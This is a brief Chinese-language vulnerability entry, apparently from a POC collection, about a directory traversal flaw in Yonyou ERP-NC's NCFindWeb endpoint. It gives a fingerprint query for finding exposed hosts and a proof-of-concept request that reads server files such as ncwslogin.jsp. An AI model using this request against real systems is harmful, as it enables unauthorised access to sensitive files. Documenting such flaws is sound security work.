用友 ERP-NC NCFindWeb 目录遍历漏洞¶

漏洞描述¶

用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息

漏洞影响¶

用友ERP-NC

网络测绘¶

app="用友-UFIDA-NC"

漏洞复现¶

POC为

/NCFindWeb?service=IPreAlertConfigService&filename=

查看 ncwslogin.jsp 文件